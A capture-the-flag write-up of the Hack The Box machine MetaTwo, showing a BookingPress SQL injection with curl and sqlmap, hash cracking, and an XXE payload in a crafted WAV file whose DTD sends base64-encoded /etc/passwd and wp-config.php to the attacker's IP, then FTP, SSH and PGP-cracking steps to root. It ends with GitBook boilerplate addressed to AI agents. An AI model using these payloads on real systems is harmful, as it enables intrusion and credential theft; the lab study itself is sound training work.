> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-metatwo.md).

# HTB - MetaTwo

## Initial Enumeration

```bash
PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### FTP

No anonymous access on FTP.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2RZtK4nUKt6c8UGx5fbB%2Fimage.png?alt=media&amp;token=6da01363-454f-4563-aeef-f6047a28875b" alt=""><figcaption></figcaption></figure>

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FcQemSKUppk0tyKU7kqQ5%2Fimage.png?alt=media&amp;token=d7060ef4-5950-47de-b958-ee924874862e" alt=""><figcaption></figcaption></figure>

Browsing to the http port reveals the `metapress.htb` domain.

clicking on the welcome on board says it is posted by admin and categorized as News.

Dirsearch revealed a redirect to wordpress instance and also the robots.txt revealed disallow to wordpress

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJS15bLATXVceEpEcSUUL%2Fimage.png?alt=media&amp;token=1db29c36-821f-42b9-9984-f51a07abea31" alt=""><figcaption></figcaption></figure>

## Wordpress

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmnyleA9dPHMq4XGflnBA%2Fimage.png?alt=media&amp;token=9eec07c6-270a-4cef-9488-15af92fd8a2b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FuBls53qlMh8Dyt7hmnTU%2Fimage.png?alt=media&amp;token=bba1aeb7-93ab-4cbe-953a-b238561e2043" alt=""><figcaption></figcaption></figure>

Wordpress 5.6.2 is running.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FyZzwAn4F2ULMJJlJsBGZ%2Fimage.png?alt=media&amp;token=348a05ac-1c5a-4963-a288-c79c6106fd60" alt=""><figcaption></figcaption></figure>

Also looking at the source code wordpress is using bookingpress plugin for appointments and its version is 1.0.10.

A google search revealed that the version is vulnerable to Unauthenticated SQL injection.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhS6TxyIb2ABGNBt8YpHI%2Fimage.png?alt=media&amp;token=01526672-953b-43cb-b824-420315221953" alt=""><figcaption></figcaption></figure>

BookingPress 1.0.11 is vulnerable to CVE-2022-0739 an unauthenticated SQL injection via the `wpnonce` AJAX action.

### Exploiting Booking Press Plugin

{% embed url="<https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357/>" %}

The plugin fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the `bookingpress_front_get_category_services` AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection.

First grab a `nonce` from any page that loads BookingPress.

```bash
┌──(ajay㉿kali)-[~/Downloads]
└─$ curl -s http://metapress.htb/events/ | grep -o "_wpnonce:'[^']*'" | head -1
_wpnonce:'baee9415b6'
```

Next invoke the curl command to test for SQLI.

```bash
┌──(ajay㉿kali)-[~/Downloads]
└─$ curl -s 'http://metapress.htb/wp-admin/admin-ajax.php' \
  --data 'action=bookingpress_front_get_category_services&_wpnonce=baee9415b6&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -' | jq .
[
  {
    "bookingpress_service_id": "10.5.15-MariaDB-0+deb11u1",
    "bookingpress_category_id": "Debian 11",
    "bookingpress_service_name": "debian-linux-gnu",
    "bookingpress_service_price": "$1.00",
    "bookingpress_service_duration_val": "2",
    "bookingpress_service_duration_unit": "3",
    "bookingpress_service_description": "4",
    "bookingpress_service_position": "5",
    "bookingpress_servicedate_created": "6",
    "service_price_without_currency": 1,
    "img_url": "http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/images/placeholder-img.jpg"
  }
]

```

SQLi is confirmed and working! You can see `MariaDB 10.5.15` on Debian 11. With this i can use sqlmap to dump the database.

### SQLMAP

```bash
┌──(ajay㉿kali)-[~/Downloads]
└─$ sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --data="action=bookingpress_front_get_category_services&_wpnonce=baee9415b6&category_id=33&total_service=-7502" -p total_service --dbs
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.10.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[12:24:43] [INFO] POST parameter 'total_service' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable


sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=baee9415b6&category_id=33&total_service=-7502) AND (SELECT 5828 FROM (SELECT(SLEEP(5)))biIn) AND (8249=8249

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=baee9415b6&category_id=33&total_service=-7502) UNION ALL SELECT NULL,CONCAT(0x716a767871,0x485261665055645a58707443646f6653536b795072754e666847517268414d53724b4e716a54496a,0x716b717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[12:24:53] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[12:24:53] [INFO] fetching database names
available databases [2]:
[*] blog
[*] information_schema

[12:24:53] [INFO] fetched data logged to text files under '/home/ajay/.local/share/sqlmap/output/metapress.htb'

[*] ending @ 12:24:53 /2026-06-08/
```

sqlmap identified two databases called `blog` and `infromation_schema`.

i can use the `blog` database to enumerate furthur.

```bash
┌──(ajay㉿kali)-[~/Downloads]
└─$ sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" \
  --data="action=bookingpress_front_get_category_services&_wpnonce=baee9415b6&category_id=33&total_service=-7502" \
  -p total_service -D blog --tables
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.10.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
12:25:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[12:25:56] [INFO] fetching tables for database: 'blog'
[12:25:56] [WARNING] reflective value(s) found and filtering out
Database: blog
[27 tables]
+--------------------------------------+
| wp_bookingpress_appointment_bookings |
| wp_bookingpress_categories           |
| wp_bookingpress_customers            |
| wp_bookingpress_customers_meta       |
| wp_bookingpress_customize_settings   |
| wp_bookingpress_debug_payment_log    |
| wp_bookingpress_default_daysoff      |
| wp_bookingpress_default_workhours    |
| wp_bookingpress_entries              |
| wp_bookingpress_form_fields          |
| wp_bookingpress_notifications        |
| wp_bookingpress_payment_logs         |
| wp_bookingpress_services             |
| wp_bookingpress_servicesmeta         |
| wp_bookingpress_settings             |
| wp_commentmeta                       |
| wp_comments                          |
| wp_links                             |
| wp_options                           |
| wp_postmeta                          |
| wp_posts                             |
| wp_term_relationships                |
| wp_term_taxonomy                     |
| wp_termmeta                          |
| wp_terms                             |
| wp_usermeta                          |
| wp_users                             |
+--------------------------------------+

[12:25:56] [INFO] fetched data logged to text files under '/home/ajay/.local/share/sqlmap/output/metapress.htb'

[*] ending @ 12:25:56 /2026-06-08/

```

There is a `wp_users` table which i enumerate furthur.

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" \
  --data="action=bookingpress_front_get_category_services&_wpnonce=baee9415b6&category_id=33&total_service=-7502" \
  -p total_service -D blog -T wp_users --columns
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.10.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[12:26:22] [WARNING] reflective value(s) found and filtering out
Database: blog
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| display_name        | varchar(250)        |
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(255)        |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicename       | varchar(50)         |
| user_pass           | varchar(255)        |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+

[12:26:22] [INFO] fetched data logged to text files under '/home/ajay/.local/share/sqlmap/output/metapress.htb'

[*] ending @ 12:26:22 /2026-06-08/                                                                                                                                                                                                                                           
```

There are two important columns in the `wp_users` table which i can dump `user_login` and `user_pass`

```bash
┌──(ajay㉿kali)-[~/Downloads]
└─$ sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" \
  --data="action=bookingpress_front_get_category_services&_wpnonce=baee9415b6&category_id=33&total_service=-7502" \
  -p total_service -D blog -T wp_users -C "user_login,user_pass" --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.10.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: blog
Table: wp_users
[2 entries]
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. |
| manager    | $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 |
+------------+------------------------------------+
```

Found two password hashes of admin and manager which i can crack using john or hashcat.

The strings starting with `$P$` (e.g., `$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.`) are **phpass** hashes.

#### Cracking the hash using hashcat

```bash
┌──(ajay㉿kali)-[~]
└─$ hashcat -m 400 --username hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting
$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar
```

hashcat cracked the hash of manager.

`manager: partylikearockstar`

With the creds i can login to the wordpress instance.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FeYKn5pytQ33xPi7QCNtr%2Fimage.png?alt=media&amp;token=a2c39eba-661c-4a77-97d3-89fa07d8547f" alt=""><figcaption></figcaption></figure>

Got access to wordpress instance we cannot edit the themes to get a shell acces.

Earlier we know the wordpress version is `5.6.2`. i can look for any exploits based on the version.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FoKvAaARVdxzxQle0Z7gB%2Fimage.png?alt=media&amp;token=8083420e-638f-42e1-b910-8de8da6f11fb" alt=""><figcaption></figcaption></figure>

Wordpress 5.6.2 is vulnerable to an authenticated `XXE injection` in the media Library.

### XXE Injection in Wordpress 5.6.2

create `evil.dtd` file where i am trying to read the `/etc/passd` file to confirm the vulnerability

```bash
┌──(ajay㉿kali)-[~/Documents]
└─$ cat > evil.dtd << 'EOF'
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.15.204?p=%file;'>" >
EOF
```

create the payload media file that points to `evil.dtd`

```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.15.204/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQy18S0OnK85jwdeoJZiG%2Fimage.png?alt=media&amp;token=15bf3ec1-cf1d-4830-9366-20231dcff560" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPeQwHJmMZCOY2lK1qxnl%2Fimage.png?alt=media&amp;token=e18c86f9-69c2-4c81-9278-4f4ddcd40b08" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FzLTtiuPPteqUxD9jkkhy%2Fimage.png?alt=media&amp;token=16505d16-36e4-48a9-ba23-e9ccfa8c2856" alt=""><figcaption></figcaption></figure>

XXE confirmed. next i can go for reading `wp-config.php` .create a new evil.dtd to read the wp-config

```bash
cat > evil.dtd << 'EOF'
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.15.204?p=%file;'>" >
EOF
```

upload the payload on the wordpress and decode the reposne you got on python serever.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F53JD1M6ufQdYDGYYWcy6%2Fimage.png?alt=media&amp;token=21c10e65-1152-44f3-8f73-14ce6faa17ef" alt=""><figcaption></figcaption></figure>

```bash
┌──(ajay㉿kali)-[~/Documents]
└─$ echo "PD9waHANCi8qKiBUaGUgbmFtZSBvZiB0aGUgZGF0YWJhc2UgZm9yIFdvcmRQcmVzcyAqLw0KZGVmaW5lKCAnREJfTkFNRScsICdibG9nJyApOw0KDQovKiogTXlTUUwgZGF0YWJhc2UgdXNlcm5hbWUgKi8NCmRlZmluZSggJ0RCX1VTRVInLCAnYmxvZycgKTsNCg0KLyoqIE15U1FMIGRhdGFiYXNlIHBhc3N3b3JkICovDQpkZWZpbmUoICdEQl9QQVNTV09SRCcsICc2MzVBcUBUZHFyQ3dYRlVaJyApOw0KDQovKiogTXlTUUwgaG9zdG5hbWUgKi8NCmRlZmluZSggJ0RCX0hPU1QnLCAnbG9jYWxob3N0JyApOw0KDQovKiogRGF0YWJhc2UgQ2hhcnNldCB0byB1c2UgaW4gY3JlYXRpbmcgZGF0YWJhc2UgdGFibGVzLiAqLw0KZGVmaW5lKCAnREJfQ0hBUlNFVCcsICd1dGY4bWI0JyApOw0KDQovKiogVGhlIERhdGFiYXNlIENvbGxhdGUgdHlwZS4gRG9uJ3QgY2hhbmdlIHRoaXMgaWYgaW4gZG91YnQuICovDQpkZWZpbmUoICdEQl9DT0xMQVRFJywgJycgKTsNCg0KZGVmaW5lKCAnRlNfTUVUSE9EJywgJ2Z0cGV4dCcgKTsNCmRlZmluZSggJ0ZUUF9VU0VSJywgJ21ldGFwcmVzcy5odGInICk7DQpkZWZpbmUoICdGVFBfUEFTUycsICc5TllTX2lpQEZ5TF9wNU0yTnZKJyApOw0KZGVmaW5lKCAnRlRQX0hPU1QnLCAnZnRwLm1ldGFwcmVzcy5odGInICk7DQpkZWZpbmUoICdGVFBfQkFTRScsICdibG9nLycgKTsNCmRlZmluZSggJ0ZUUF9TU0wnLCBmYWxzZSApOw0KDQovKiojQCsNCiAqIEF1dGhlbnRpY2F0aW9uIFVuaXF1ZSBLZXlzIGFuZCBTYWx0cy4NCiAqIEBzaW5jZSAyLjYuMA0KICovDQpkZWZpbmUoICdBVVRIX0tFWScsICAgICAgICAgJz8hWiR1R08qQTZ4T0U1eCxwd2VQNGkqejttYHwuWjpYQClRUlFGWGtDUnlsN31gclhWRz0zIG4+KzNtPy5CLzonICk7DQpkZWZpbmUoICdTRUNVUkVfQVVUSF9LRVknLCAgJ3gkaSQpYjBdYjFjdXA7NDdgWVZ1YS9KSHElKjhVQTZnXTBid29FVzo5MUVaOWhdcldsVnElSVE2NnBmez1dYSUnICk7DQpkZWZpbmUoICdMT0dHRURfSU5fS0VZJywgICAgJ0orbXhDYVA0ejxnLjZQXnRgeml2PmRkfUVFaSU0OCVKblJxXjJNakZpaXRuIyZuK0hYdl18fEUrRn5De3FLWHknICk7DQpkZWZpbmUoICdOT05DRV9LRVknLCAgICAgICAgJ1NtZURyJCRPMGppO145XSpgfkdOZSFwWEBEdldiNG05RWQ9RGQoLnItcXteeihGPyk3bXhOVWc5ODZ0UU83TzUnICk7DQpkZWZpbmUoICdBVVRIX1NBTFQnLCAgICAgICAgJ1s7VEJnYy8sTSMpZDVmW0gqdGc1MGlmVD9adi41V3g9YGxAdiQtdkgqPH46MF1zfWQ8Jk07Lix4MHp+Uj4zIUQnICk7DQpkZWZpbmUoICdTRUNVUkVfQVVUSF9TQUxUJywgJz5gVkFzNiFHOTU1ZEpzPyRPNHptYC5RO2FtaldedUpya18xLWRJKFNqUk9kV1tTJn5vbWlIXmpWQz8yLUk/SS4nICk7DQpkZWZpbmUoICdMT0dHRURfSU5fU0FMVCcsICAgJzRbZlNeMyE9JT9ISW9wTXBrZ1lib3k4LWpsXmldTXd9WSBkfk49Jl5Kc0lgTSlGSlRKRVZJKSBOI05PaWRJZj0nICk7DQpkZWZpbmUoICdOT05DRV9TQUxUJywgICAgICAgJy5zVSZDUUBJUmxoIE87NWFzbFkrRnE4UVdoZVNOeGQ2VmUjfXchQnEsaH1WOWpLU2tUR3N2JVk0NTFGOEw9YkwnICk7DQoNCi8qKg0KICogV29yZFByZXNzIERhdGFiYXNlIFRhYmxlIHByZWZpeC4NCiAqLw0KJHRhYmxlX3ByZWZpeCA9ICd3cF8nOw0KDQovKioNCiAqIEZvciBkZXZlbG9wZXJzOiBXb3JkUHJlc3MgZGVidWdnaW5nIG1vZGUuDQogKiBAbGluayBodHRwczovL3dvcmRwcmVzcy5vcmcvc3VwcG9ydC9hcnRpY2xlL2RlYnVnZ2luZy1pbi13b3JkcHJlc3MvDQogKi8NCmRlZmluZSggJ1dQX0RFQlVHJywgZmFsc2UgKTsNCg0KLyoqIEFic29sdXRlIHBhdGggdG8gdGhlIFdvcmRQcmVzcyBkaXJlY3RvcnkuICovDQppZiAoICEgZGVmaW5lZCggJ0FCU1BBVEgnICkgKSB7DQoJZGVmaW5lKCAnQUJTUEFUSCcsIF9fRElSX18gLiAnLycgKTsNCn0NCg0KLyoqIFNldHMgdXAgV29yZFByZXNzIHZhcnMgYW5kIGluY2x1ZGVkIGZpbGVzLiAqLw0KcmVxdWlyZV9vbmNlIEFCU1BBVEggLiAnd3Atc2V0dGluZ3MucGhwJzsNCg==" | base64 -d
<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'blog' );

/** MySQL database username */
define( 'DB_USER', 'blog' );

/** MySQL database password */
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );

/**#@+
 * Authentication Unique Keys and Salts.
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );
define( 'SECURE_AUTH_KEY',  'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );
define( 'LOGGED_IN_KEY',    'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );
define( 'NONCE_KEY',        'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );
define( 'AUTH_SALT',        '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );
define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );
define( 'LOGGED_IN_SALT',   '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );
define( 'NONCE_SALT',       '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );

/**
 * WordPress Database Table prefix.
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

```

Got the FTP credentials.

`metapress.htb : 9NYS_ii@FyL_p5M2NvJ`

i can use them to login via FTP.

## FTP Access as Metapress.htb

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVEWENEa5BI1cEqGn7V52%2Fimage.png?alt=media&amp;token=2313455d-b4d1-4ba8-83a1-c39bdfda0d20" alt=""><figcaption></figcaption></figure>

```bash
ftp> binary
200 Type set to I
ftp> ls
229 Entering Extended Passive Mode (|||28700|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   5 metapress.htb metapress.htb     4096 Oct  5  2022 blog
drwxr-xr-x   3 metapress.htb metapress.htb     4096 Oct  5  2022 mailer
```

There are two directories blog and mailer. Seems like blog is the directory where website is.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Frp7utxA8FGedoUxqfDRe%2Fimage.png?alt=media&amp;token=0e2fcbe1-03fb-4ff1-8665-e0ae60251804" alt=""><figcaption></figcaption></figure>

i can inspect the mailer directory further.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fth6PHW68M43WTuXWDsic%2Fimage.png?alt=media&amp;token=7b8bfc3d-d774-43f8-ad60-7000f92d8cd0" alt=""><figcaption></figcaption></figure>

the mailer directory has `send_mail.php` file which we can extract and inspect.

```bash
ftp> get send_email.php
local: send_email.php remote: send_email.php
229 Entering Extended Passive Mode (|||4234|)
150 Opening BINARY mode data connection for send_email.php (1126 bytes)
100% |***********************************************************************************************************************************************************************************************|  1126        2.91 MiB/s    00:00 ETA
226 Transfer complete
1126 bytes received in 00:00 (22.56 KiB/s)
ftp> 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHCm0pwWqJHvQWOwhhNrx%2Fimage.png?alt=media&amp;token=0ee4f89b-2ac4-453b-b485-fa3b387ffd13" alt=""><figcaption></figcaption></figure>

php file has credentials for jnelson.

`jnelson@metapress.htb : Cb4_JmWM8zUZWMu@Ys`

i can use them to get access through ssh.

## Shell as jnelson

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUVAkuyXrrc7uFkmCUPgV%2Fimage.png?alt=media&amp;token=bdd6e1cc-956c-4e21-b3d5-3285daabc79e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fj2bGKcgARKJN3FcPnDAD%2Fimage.png?alt=media&amp;token=4f472419-888c-43d8-91ab-4834e9747d37" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKtxfgT2VRvfWQq9ASO9M%2Fimage.png?alt=media&amp;token=2c36d14e-7c14-4ac2-b421-bed32f4c8789" alt=""><figcaption></figcaption></figure>

found a .passpie hidden directory. in which i found the root.pass which belongs to root.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPAjBZZiQDsyXb8szrTIA%2Fimage.png?alt=media&amp;token=3b12aa1d-80fe-4a9d-b8e7-50bab6b22cfd" alt=""><figcaption></figcaption></figure>

Also running passpie displays some crdentials for jnelson and root.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FkHFzrIwH5uZBY8AyKxqM%2Fimage.png?alt=media&amp;token=7ecaf9c4-17eb-4891-9bd9-b14c71be9fcc" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FW8ru6TUdKOEyfcJcYwyh%2Fimage.png?alt=media&amp;token=7ad27c2b-b825-4c02-a628-7400391fcced" alt=""><figcaption></figcaption></figure>

The key is pgp encrypted so we need to crack it for it transfer the key to attackmachine and use john to crack.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FuGKaR8pbwXyvSxt1noXL%2Fimage.png?alt=media&amp;token=c8dd4aef-68c9-4c17-8cd3-81b0f5d51d6a" alt=""><figcaption></figcaption></figure>

Strip the public key block, keeping only the private key (-----BEGIN PGP PRIVATE KEY BLOCK----- to -----END PGP PRIVATE KEY BLOCK-----), save it as private.key.

### Cracking PGP key

```bash
┌──(ajay㉿kali)-[~]
└─$ gpg2john private.key > gpg.hash                                                                     

File private.key
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt gpg.hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blink182         (Passpie)     
1g 0:00:00:02 DONE (2026-06-08 13:41) 0.4761g/s 78.09p/s 78.09c/s 78.09C/s ginger..blink182
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

got the key for passpie.

## Shell as ROOT

Now using the key back on root run the below code to get the root password.

```bash
jnelson@meta2:~/.passpie/ssh$ passpie copy --to stdout --passphrase blink182 root@ssh
p7qfAZt4_A1xo_0x
jnelson@meta2:~/.passpie/ssh$ 

```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2O3a4vLokHGK9m2Gc03Z%2Fimage.png?alt=media&amp;token=1e22df48-1149-4cb2-95af-2186822d9771" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fh569eDOqIUMNMppn1f0G%2Fimage.png?alt=media&amp;token=425ab7a9-a52a-4706-9047-eb2f37f3eaf9" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-metatwo.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

